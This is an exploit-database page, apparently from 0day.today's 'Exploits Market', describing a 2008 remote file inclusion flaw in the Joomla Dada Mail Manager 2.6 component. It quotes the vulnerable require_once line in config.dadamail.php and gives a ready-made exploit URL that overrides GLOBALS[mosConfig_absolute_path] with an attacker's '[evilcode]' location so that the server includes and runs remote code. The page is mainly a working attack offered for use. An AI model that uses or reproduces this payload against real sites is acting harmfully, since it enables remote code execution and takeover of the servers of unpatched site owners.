[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component Dada Mail Manager 2.6 RFI Vulnerability

Author
NoGe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4078
Category
web applications
Date add
05-11-2008
Platform
unsorted
========================================================
Joomla Component Dada Mail Manager 2.6 RFI Vulnerability
========================================================


======================================================================================================================================


  [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability

       Software : com_dadamail version 2.6
       Vendor   : http://joomlander.net
       Download : http://joomlacode.org/gf/project/dadamailmanager/frs
       Author   : NoGe
       Blog     : http://evilc0de.blogspot.com


======================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_dadamail/config.dadamail.php

        require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');



  [o] Exploit

       http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]


======================================================================================================================================




#  0day.today [2024-09-29]  #